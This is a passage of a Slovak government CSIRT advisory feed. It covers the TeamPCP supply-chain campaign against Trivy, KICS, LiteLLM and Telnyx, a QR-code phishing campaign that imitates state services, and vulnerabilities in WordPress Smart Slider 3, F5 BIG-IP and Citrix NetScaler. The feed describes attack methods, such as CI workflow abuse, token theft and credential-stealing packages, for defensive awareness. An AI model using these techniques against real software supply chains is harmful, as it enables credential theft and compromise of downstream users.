</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verziu FortiClientEMS 7.4.7. Alternatívne môžete nainštalovať hotfix podľa postupu pre zraniteľnú verziu <a href="https://docs.fortinet.com/document/forticlient/7.4.5/ems-release-notes/832484">7.4.5</a> a <a href="https://docs.fortinet.com/document/forticlient/7.4.6/ems-release-notes/832484">7.4.6</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-35616">https://nvd.nist.gov/vuln/detail/CVE-2026-35616</a></li>



<li><a href="https://fortiguard.fortinet.com/psirt/FG-IR-26-099">https://fortiguard.fortinet.com/psirt/FG-IR-26-099</a></li>



<li><a href="https://thehackernews.com/2026/04/fortinet-patches-actively-exploited-cve.html">https://thehackernews.com/2026/04/fortinet-patches-actively-exploited-cve.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3306/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Skupina TeamPCP kompromituje populárne softvérové balíky a produkty</title>
		<link>/posts/3304</link>
					<comments>/posts/3304#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 02 Apr 2026 10:46:27 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[CanisterWorm]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[kampaň]]></category>
		<category><![CDATA[KICS]]></category>
		<category><![CDATA[Kubernetes]]></category>
		<category><![CDATA[LiteLLM]]></category>
		<category><![CDATA[TeamPCP]]></category>
		<category><![CDATA[Telnyx]]></category>
		<category><![CDATA[Trivy]]></category>
		<guid isPermaLink="false">/?p=3304</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/hackers2.png" alt="" /></p>Popis hrozby: Skupina TeamPCP vedie niekoľkofázovú, eskalujúcu kampaň zameranú na kompromitáciu softvérového dodávateľského reťazca. Útočníci zneužívajú dôveryhodné distribučné kanály (PyPI,...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/hackers2.png" alt="" /></p>
<p><strong>Popis hrozby:</strong></p>



<p>Skupina TeamPCP vedie niekoľkofázovú, eskalujúcu kampaň zameranú na kompromitáciu softvérového dodávateľského reťazca. Útočníci zneužívajú dôveryhodné distribučné kanály (PyPI, GitHub, NPM, Docker Hub) a kompromitujú populárne nástroje a knižnice (Trivy, KICS, LiteLLM, Telnyx), čím obchádzajú tradičné bezpečnostné mechanizmy.</p>



<p>Cieľom skupiny je distribúcia malvéru, ktorý následne umožňuje krádež prihlasovacích údajov, kompromitáciu prostredí CI/CD a krádež kryptomien. V niektorých prípadoch vykonáva aj deštruktívne útoky, aktuálne zamerané proti Iránu.</p>



<p>Kampane skupiny TeamPCP predstavujú vysoké riziko pre organizácie využívajúce open-source nástroje a&nbsp;knižnice.</p>



<p><strong>Kampane:</strong></p>



<ol>
<li><strong>Kampaň proti Docker API, Kubernetes, REDIS&nbsp; React Server (december 2025)</strong>: Skupina TeamPCP viedla v&nbsp;decembri 2025 kampaň, v ktorej zneužívala nedostatočne zabezpečené Docker API, klastre Kubernetes, dashboardy RAY, servery REDIS a zraniteľnosť React2Shell (<a href="https://nvd.nist.gov/vuln/detail/CVE-2025-55182">CVE-2025-55182</a>) nástroja React Server Components na vytváranie škodlivej infraštruktúry. Kompromitované uzly boli zneužívané na široké spektrum škodlivých aktivít vrátane zapojenia do proxy sietí, skenovania a ďalšieho šírenia, ťažby kryptomien, exfiltráciu citlivých údajov, nasadenie ransomvéru a následné vydieranie obetí. Skupina exfiltrované dáta zverejňovala na svojom telegramovom kanáli.</li>



<li><strong>Trivy – útok na dodávateľský reťazec (marec 2026):</strong> Skupina kompromitovala populárny bezpečnostný nástroj na skenovanie zraniteľností Trivy. Útočníci zneužili chybu v GitHub Actions workflow (konkrétne pull_request_target), cez ktorú získali privilegovaný token GitHub (PAT). Následne prevzali kontrolu nad repozitárom, mazali vydania a publikovali škodlivé rozšírenie VS Code obsahujúce infostealer. Útok bol súčasťou širšej automatizovanej kampane hackerbot-claw, ktorá skenovala tisíce projektov na zraniteľné konfigurácie CI/CD. Kampaň prebiehala aj v&nbsp;marci 2026, kedy skupina rozšírila útok na dodávateľský reťazec cez infikované inštancie Trivy publikované na Docker Hub.</li>



<li><strong>Checkmarx KICS – útok na dodávateľský reťazec (marec 2026):</strong> TeamPCP kompromitovala bezpečnostný skenovací nástroj KICS spoločnosti Checkmarx pre GitHub Action, prostredníctvom ktorého následne šírila infostealer.</li>



<li><strong>Knižnice PyPI – útok na dodávateľský reťazec (marec 2026):</strong> Skupina infikovala knižnice Telnyx a LiteLLM distribuované nástrojom PyPI pre programovací jazyk Python škodlivým kódom, ktorý vytvára v&nbsp;infikovaných systémoch zadné vrátka a&nbsp;kradne prihlasovacie údaje a&nbsp;iné citlivé údaje. Exfiltrované dáta ukryla v&nbsp;audio súboroch.</li>



<li><strong>CanisterWorm a deštruktívna kampaň voči Iránu (marec 2026):</strong> Skupina vykonávala útoky na dodávateľský reťazec v&nbsp;rámci kampani nesúcej podobné znaky, ako kampaň šíriaca infostealer CanisterWorm. Tento malvér napríklad využíva rovnaký ICP kanister pre C2. Nová kampaň sa zameriava na odhaľovanie&nbsp;iránskych systémov. Malvér na základe časovej zóny a locale cieľový systém klastrov Kubernetes buď infikuje malvérom CanisterWorm a&nbsp;vytvorí zadné vrátka, alebo v prípade indikácie, že sa jedná o iránsky systém, pristúpi k deštruktívnemu mazaniu klastrov Kubernetes.</li>



<li><strong>Krádež zdrojového kódu spoločnosti Cisco (marec 2026): </strong>Spoločnosť Cisco zasiahol kybernetický incident, keď viacero útočných skupín zneužilo ukradnuté prihlasovacie údaje získané v rámci kampane kompromitujúcej nástroj Trivy. Prenikli do jej interného vývojového prostredia, kde pomocou škodlivého modulu GitHub Actions získali prístup ku prostrediam CI/CD. Odtiaľ odcudzili zdrojový kód a AWS kľúče firmy aj jej zákazníkov. Útočníci skopírovali stovky repozitárov. Incident zasiahol viacero zariadení vrátane vývojárskych staníc spoločnosti. Cisco izolovala zasiahnuté systémy a začala rotovať prihlasovacie údaje.</li>



<li><strong>Útok na cloudové účty AWS Európskej komisie (marec 2025):</strong> jednotka CERT‑EU informovala, že útočníci zo skupiny TeamPCP zneužili kompromitovaný API kľúč na prístup ku cloudovým účtom v službe Amazon AWS patriacim Európskej komisii, ktorý získali pravdepodobne v rámci kampane proti Trivy. Ukradli desiatky gigabajtov dát obsahujúcich mená, e‑mailové adresy a ďalšie súbory a ovplyvnili údaje minimálne 30 ďalších subjektov EÚ, ktoré používajú rovnakú infraštruktúru. Časť ukradnutých dát sa objavila online a CERT‑EU pokračuje vo vyšetrovaní, analýze a notifikácii dotknutých organizácií.</li>
</ol>



<p><strong>Dopad na Slovensko:</strong></p>



<p>Vzhľadom na obľúbenosť kompromitovaných knižníc a&nbsp;nástrojov medzi vývojármi sa malvér šírený v rámci kampane skupiny TeamPCP mohol rozšíriť aj do produktov a&nbsp;repozitárov slovenských softvérových developerov, resp. ich zákazníkov.</p>



<p><strong>Odporúčania:</strong> </p>



<ul>
<li>Ak používate nástroj Trivy vo verzii 0.69.4, 0.69.5 alebo 0.69.6, Trivy-action s&nbsp;tagom 0.34.2 alebo starším a&nbsp;Setup-trivy verzie nižšej ako 0.2.6, vymeňte verziu na Trivy 0.69.3, Trivy-action na 0.35.0 a&nbsp;Setup-trivy na 0.2.6, alebo novšiu nekompromitovanú verziu. Preverte tiež prítomnosť <a href="https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise">indikátorov kompromitácie</a>.</li>



<li>Ak používate skener Chceckmarx KICS (kics-github-action) verzie 1.1, zmeňte používanú verziu. Preverte tiež prítomnosť <a href="https://www.wiz.io/blog/teampcp-attack-kics-github-action">indikátorov kompromitácie</a>.</li>



<li>Ak používate knižnicu Telnyx verzie 4.87.1 alebo 4.87.2, aktualizujte na vyššiu verziu, alebo vykonajte downgrade na verziu 4.87.0. Preverte tiež prítomnosť <a href="https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026">indikátorov kompromitácie</a>.</li>



<li>Ak používate knižnicu LiteLLM vo verziách 1.82.7 alebo 1.82.8, aktualizujte na vyššiu verziu, alebo vykonajte downgrade na verziu 1.82.6. Návod na mitigáciu hrozby a&nbsp;indikátory kompromitácie nájdete <a href="https://www.endorlabs.com/learn/teampcp-isnt-done">tu</a>.</li>



<li>Ak využívate infraštruktúru Kubernetes, preverte prítomnosť <a href="https://www.aikido.dev/blog/teampcp-stage-payload-canisterworm-iran">indikátorov kompromitácie</a> kampane CanisterWorm.</li>
</ul>



<ul>
<li>Venujte pozornosť aj spôsobu, akým váš kód definuje používané verzie knižníc. Ak napríklad &nbsp;používate „un/pinned“ verzie v requirements.txt, skontrolujte, či sú striktne definované len overené verzie bez kompromitácie.</li>



<li>Odrotujte relačné tokeny a&nbsp;API kľúče. </li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026">https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026</a></li>



<li><a href="https://www.ox.security/blog/telnyx-malware-teampcp-strikes-again-following-litellm-compromise/">https://www.ox.security/blog/telnyx-malware-teampcp-strikes-again-following-litellm-compromise/</a></li>



<li><a href="https://www.ox.security/blog/litellm-malware-malicious-pypi-versions-steal-cloud-and-crypto-credentials/">https://www.ox.security/blog/litellm-malware-malicious-pypi-versions-steal-cloud-and-crypto-credentials/</a></li>



<li><a href="https://www.endorlabs.com/learn/teampcp-isnt-done">https://www.endorlabs.com/learn/teampcp-isnt-done</a></li>



<li><a href="https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise">https://socket.dev/blog/trivy-under-attack-again-github-actions-compromise</a></li>



<li><a href="https://socket.dev/blog/trivy-docker-images-compromised">https://socket.dev/blog/trivy-docker-images-compromised</a></li>



<li><a href="https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware">https://flare.io/learn/resources/blog/teampcp-cloud-native-ransomware</a></li>



<li><a href="https://www.wiz.io/blog/teampcp-attack-kics-github-action">https://www.wiz.io/blog/teampcp-attack-kics-github-action</a></li>



<li><a href="https://www.aikido.dev/blog/teampcp-stage-payload-canisterworm-iran">https://www.aikido.dev/blog/teampcp-stage-payload-canisterworm-iran</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/cisco-source-code-stolen-in-trivy-linked-dev-environment-breach/">https://www.bleepingcomputer.com/news/security/cisco-source-code-stolen-in-trivy-linked-dev-environment-breach/</a></li>



<li><a href="https://cert.europa.eu/blog/european-commission-cloud-breach-trivy-supply-chain">https://cert.europa.eu/blog/european-commission-cloud-breach-trivy-supply-chain</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3304/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností marec 2026</title>
		<link>/posts/3294</link>
					<comments>/posts/3294#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 02 Apr 2026 08:50:54 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3294</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2026....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2026.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/04/2026_03_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 03/2026 PDF (675 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3294/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Nová phishingová kampaň imituje služby štátnych inštitúcií. Podvodníci lepia aj nálepky na autá. [aktualizované]</title>
		<link>/posts/3238</link>
					<comments>/posts/3238#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Mar 2026 11:16:40 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[kampaň]]></category>
		<category><![CDATA[Phishing]]></category>
		<guid isPermaLink="false">/?p=3238</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/03/phishSVK.png" alt="" /></p>VJ CSIRT získala informácie o&#160;nových podvodných webstránkach, ktoré sa snažia napodobniť vzhľad a&#160;funkcie oficiálnych elektronických služieb štátu.Ide o novú phishingovú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/03/phishSVK.png" alt="" /></p>
<p><strong>VJ CSIRT</strong> získala informácie o&nbsp;nových podvodných webstránkach, ktoré sa snažia napodobniť vzhľad a&nbsp;funkcie oficiálnych elektronických služieb štátu.<br><strong>Ide o novú phishingovú / smishingovú kampaň, ktorá sa môže v nasledujúcich dňoch objavovať plošne.</strong></p>



<p>Útočníci používajú dôveryhodne vyzerajúce domény, platené certifikáty, aj funkčné odkazy na skutočné informácie a služby, čím sa snažia zvýšiť dôveryhodnosť falošných stránok a zvýšiť tak šancu vylákania osobných údajov, prihlasovacích údajov alebo platobných informácií, či priamo podvodom docieliť prevod finančných prostriedkov.</p>



<p><strong>Ku dňu 30.03.2026 evidujeme nahlásenia súvisiace s&nbsp;predmetnou kampaňou vo forme zatiaľ dvoch identifikovaných webových stránok </strong></p>



<ul>
<li><strong>platbymvsr[.]sk</strong></li>



<li><strong>platby-mvsr[.]sk</strong></li>
</ul>


<div class="wp-block-image">
<figure class="aligncenter"><img loading="lazy" decoding="async" width="869" height="588" src="/wp-content/uploads/2026/03/obrazok.png" alt="" class="wp-image-3239"/><figcaption class="wp-element-caption"><strong>„platby-mvsr[.]sk“ </strong><em>stránka napodobňujúca Ministerstvo vnútra SR a dopravný inšpektorát (umožňujúca „úhradu pokút“)</em></figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="945" height="405" src="/wp-content/uploads/2026/03/obrazok-1.png" alt="" class="wp-image-3240"/><figcaption class="wp-element-caption"><strong>„sk-slovensko[.]web[.]app“ </strong><em>falošná prihlasovacia stránka tváriaca sa ako slovensko.sk (ide o&nbsp;historickú phishingovú stránku, ktorá je stále nahlasovaná)</em></figcaption></figure></div>


<p><strong>Kampaň sa podľa dostupných informácií šíri tak, že občania si na zaparkovaných motorových vozidlách nachádzajú nálepky alebo letáky, ktoré ich upozorňujú na potencionálne spáchanie priestupku proti bezpečnosti a&nbsp;plynulosti cestnej premávky.</strong></p>



<p>Naskenovaním QR kódu je obeť presmerovaná na jednu z vyššie uvedených škodlivých stránok, kde sa od neho vyžaduje vyplnenie osobných údajov a následne verifikácia cez SMS. V ďalšom kroku sa zobrazí požiadavka uhradiť pokutu za údajný priestupok.</p>


<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="454" height="518" src="/wp-content/uploads/2026/03/Obrazok1.jpg" alt="" class="wp-image-3246"/><figcaption class="wp-element-caption"><em>Nálepky a letáky, ktoré nechávajú aktéri kampane na</em> <em>motorových vozidlách</em></figcaption></figure></div>

<div class="wp-block-image">
<figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="744" height="794" src="/wp-content/uploads/2026/03/Obrazok2-1.jpg" alt="" class="wp-image-3260"/><figcaption class="wp-element-caption"><em>Podvodná stránka otvorená cez mobilný telefón</em></figcaption></figure></div>


<p class="has-text-align-left"><strong>Venujte preto zvýšenú pozornosť adrese webovej stránky <strong>(URL) </strong>pred prihlásením sa, či zadaním osobných alebo platobných údajov. Oficiálne vládne portály sa vždy nachádzajú na doménach:</strong></p>



<ul>
<li>.<strong>gov.sk</strong></li>



<li>.<strong>minv.sk</strong></li>



<li><strong>.slovensko.sk</strong> </li>
</ul>



<p>Ak narazíte na podozrivý web, neposkytujte žiadne údaje a nahláste udalosť na <strong>incident@csirt.sk</strong>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3238/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť WordPress Smart Slider 3 umožňuje krádež dát</title>
		<link>/posts/3251</link>
					<comments>/posts/3251#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Mar 2026 11:16:33 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Smart Slider 3]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=3251</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/03/smart_slider.png" alt="" /></p>Bezpečnostní výskumníci upozornili na kritickú zraniteľnosť v doplnku Smart Slider 3 pre WordPress, ktorý je aktívny na viac ako 800...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/03/smart_slider.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci upozornili na kritickú zraniteľnosť v doplnku Smart Slider 3 pre WordPress, ktorý je aktívny na viac ako 800 000 webových stránkach. Zraniteľnosť umo</strong><strong>žň</strong><strong>uje ak</strong><strong>é</strong><strong>muko</strong><strong>ľ</strong><strong>vek autentifikovan</strong><strong>é</strong><strong>mu pou</strong><strong>ží</strong><strong>vate</strong><strong>ľ</strong><strong>ovi vr</strong><strong>á</strong><strong>tane </strong><strong>ú</strong><strong>rovne subscriber </strong><strong>čí</strong><strong>ta</strong><strong>ť</strong><strong> </strong><strong>ľ</strong><strong>ubovo</strong><strong>ľ</strong><strong>n</strong><strong>é</strong><strong> s</strong><strong>ú</strong><strong>bory na serveri.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WordPress Smart Slider 3, verzia 3.5.1.33 a staršie &nbsp;</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-3098</strong> (CVSS skóre 6,5)</p>



<p>Zraniteľnosť sa nachádza vo funkcii <em>actionExportAll()</em>, ktorá súvisí s exportom súborov. Funkcia nekontroluje formát a zdroj vyžiadaného súboru. To umožňuje akémukoľvek autentifikovanému používateľovi vrátane úrovne subscriber prečítať ľubovoľné súbory na serveri, vrátane citlivých dát vo <em>wp‑config.php</em>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia modulu Smart Slider 3 aspoň na verziu 3.5.1.34.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/blog/2026/03/800000-wordpress-sites-affected-by-arbitrary-file-read-vulnerability-in-smart-slider-3-wordpress-plugin/">https://www.wordfence.com/blog/2026/03/800000-wordpress-sites-affected-by-arbitrary-file-read-vulnerability-in-smart-slider-3-wordpress-plugin/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3098">https://nvd.nist.gov/vuln/detail/CVE-2026-3098</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3251/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Útočníci zneužívajú kritickú zraniteľnosť F5 BIG-IP APM</title>
		<link>/posts/3249</link>
					<comments>/posts/3249#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Mar 2026 11:13:02 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[BIG-IP]]></category>
		<category><![CDATA[F5]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3249</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/f5-1024x599.png" alt="" /></p>Spoločnosť F5 opravila kritickú chybu zabezpečenia na zariadeniach BIG-IP APM, ktorá môže viesť ku vykonaniu kódu na diaľku za nešpecifikovaných...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/f5-1024x599.png" alt="" /></p>
<p><strong>Spoločnosť F5 opravila kritickú chybu zabezpečenia na zariadeniach BIG-IP APM, ktorá môže viesť ku vykonaniu kódu na diaľku za nešpecifikovaných podmienok.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>BIG-IP APM 15.1.0 – 15.1.10</li>



<li>BIG-IP APM 16.1.0 – 16.1.6</li>



<li>BIG-IP APM 17.1.0 – 17.1.2</li>



<li>BIG-IP APM 17.5.0 – 17.5.1<strong></strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-53521</strong> (CVSS 4.0 skóre 9,3)</p>



<p>Americká organizácia CISA pridala do katalógu aktívne zneužívaných zraniteľností kritickú chybu zabezpečenia v produkte F5 BIG-IP APM, ktorá umožňuje vzdialené vykonávanie kódu. Chyba sa nachádza v procese <em>apmd</em> na dátovej úrovni, keď prístupová politika nakonfigurovaná na virtuálnom serveri. Zneužiť ju môže neautentifikovaný útočník pomocou nešpecifikovanej škodlivej premávky.</p>



<p>Spoločnosť F5 v marci 2026 prekategorizovala pôvodnú zraniteľnosť z DDoS na RCE a zvýšila jej závažnosť.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia BIG-IP APM aspoň na verziu 17.5.1.3, 17.1.3, 16.1.6.1 alebo 15.1.10.8.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.cisa.gov/news-events/alerts/2026/03/27/cisa-adds-one-known-exploited-vulnerability-catalog">https://www.cisa.gov/news-events/alerts/2026/03/27/cisa-adds-one-known-exploited-vulnerability-catalog</a></li>



<li><a href="https://my.f5.com/manage/s/article/K000156741">https://my.f5.com/manage/s/article/K000156741</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-53521">https://nvd.nist.gov/vuln/detail/CVE-2025-53521</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3249/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti Citrix NetScaler ADC a Gateway</title>
		<link>/posts/3243</link>
					<comments>/posts/3243#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 24 Mar 2026 16:24:49 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NetScaler]]></category>
		<guid isPermaLink="false">/?p=3243</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>Spoločnosť Citrix na základe interných kontrol objavila a&#160;opravila kritickú zraniteľnosť produktov Citrix NetScaler ADC a&#160;Gateway, ktorá umožňuje čítanie pamäte mimo...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>
<p><strong>Spoločnosť Citrix na základe interných kontrol objavila a&nbsp;opravila kritickú zraniteľnosť produktov Citrix NetScaler ADC a&nbsp;Gateway, ktorá umožňuje čítanie pamäte mimo povolené hodnoty. Zároveň opravila vysoko závažnú zraniteľnosť vedúcu ku zámene relácií používateľov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1 verzie staršie ako 14.1-66.59</li>



<li>NetScaler ADC a NetScaler Gateway 13.1 verzie staršie ako 13.1-62.23</li>



<li>NetScaler ADC FIPS a NDcPP verzie staršie ako 13.1-37.262</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-3055</strong> (CVSS skóre 9,3)</p>



<p>Kritická zraniteľnosť v Citrix NetScaler ADC a NetScaler Gateway vzniká, pokiaľ je zariadenie nakonfigurované ako SAML IDP. Vyplýva z nedostatočného overovania vstupov. Vzdialený neautorizovaný útočník získa jej zneužitím možnosť čítať pamäť zraniteľného zariadenia mimo povolené hodnoty.</p>



<p><strong>CVE-2026-4368</strong> (CVSS skóre 7,7)</p>



<p>Vysoko závažná zraniteľnosť v Citrix NetScaler ADC a NetScaler Gateway vzniká, pokiaľ je zariadenie nakonfigurované ako Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy) alebo virtuálny AAA server. Vyplýva zo súbehu procesov. Vzdialený útočník s nízkymi oprávneniami môže jej zneužitím spôsobiť zámenu používateľských relácií.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Únik citlivých informácií</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia aspoň na verzie</p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1-66.59</li>



<li>NetScaler ADC a NetScaler Gateway 13.1-62.23</li>



<li>NetScaler ADC FIPS a NDcPP 13.1-37.262</li>
</ul>



<p>Cloudové inštancie výrobca opravil automaticky a&nbsp;nie je pre ne potrebné vykonať ďalšie kroky.</p>



<p>Pre overenie, či máte zariadenie nakonfigurované ako SAML IDP, vyhľadajte v NetScaler Configuration reťazec „<em>add authentication samlIdPProfile .*</em>“.</p>



<p>Pre overenie, či máte zariadenie nakonfigurované ako virtuálny AAA server, vyhľadajte v NetScaler Configuration reťazec „<em>add authentication vserver .*</em>“.</p>



<p>Pre overenie, či máte zariadenie nakonfigurované ako Gateway (SSL VPN, ICA Proxy, CVPN, RDP Proxy), vyhľadajte v NetScaler Configuration reťazec „<em>add vpn vserver .*</em>“.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.rapid7.com/blog/post/etr-cve-2026-3055-citrix-netscaler-adc-and-netscaler-gateway-out-of-bounds-read/">https://www.rapid7.com/blog/post/etr-cve-2026-3055-citrix-netscaler-adc-and-netscaler-gateway-out-of-bounds-read/</a></li>



<li><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300">https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX696300</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-3055">https://nvd.nist.gov/vuln/detail/CVE-2026-3055</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-4368">https://nvd.nist.gov/vuln/detail/CVE-2026-4368</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3243/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – február 2026</title>
		<link>/posts/3233</link>
					<comments>/posts/3233#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 20 Mar 2026 13:52:29 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=3233</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2026....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2026. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií   zozbieraných jednotkou CSIRT.SK pri svojej činnosti.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2026/03/MS202602.pdf" data-type="link" data-id="/wp-content/uploads/2025/02/MS202412.pdf">Mesačná správa – 02/2026 PDF (1 747 KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3233/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť ScreenConnect umožňuje prístup k reláciám</title>
		<link>/posts/3224</link>
